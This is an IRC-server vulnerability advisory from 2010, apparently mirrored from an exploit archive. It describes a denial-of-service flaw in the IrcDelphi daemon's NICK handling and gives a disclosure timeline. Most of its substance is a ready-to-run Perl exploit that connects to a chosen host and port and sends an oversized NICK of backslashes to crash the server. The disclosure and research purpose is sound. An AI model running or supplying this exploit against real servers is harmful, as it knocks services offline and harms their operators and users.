IrcDelphi Daemon Server Denial of Service
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>IrcDelphi Daemon Server Denial of Service</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
IrcDelphi Daemon Server Denial of Service
=========================================
[Software]
- IrcDelphi Daemon Server
[Vendor Product Description]
- IRC Daemon (IRCd, IRC Server) coded in Delphi/Kylix using Indy
components. Easy to use and light irc daemon.
[Bug Description]
- The IRC Daemon does not sanitize the variable NICK correctly leading
to a Denial-of-Service flaw.
[History]
- Advisory sent to vendor on 06/21/2010.
- No response
- Public adv. 07/02/2010
[Impact]
- Low
[Affected Version]
- IrcDelphi core-alpha1
- Prior versions may also be vulnerable.
[Codes]
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
usage();
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request…n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAIL
ED!n";
print $socket "USER AA AA AA :AArn";
print $socket "NICK ". "\" x 200 ."rn";
sleep(3);
close($socket);
print "[+] Done!n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>n";
print "[-] Example: ". $0 ." 127.0.0.1 6667n";
exit;
}
———————————————————————————
——-
DcLabs Security Group
Sponsor: ipax
ipax@dclabs.com.br
[Credits]
Crash and all DcLabs members.
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-08]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13240
Leave a Reply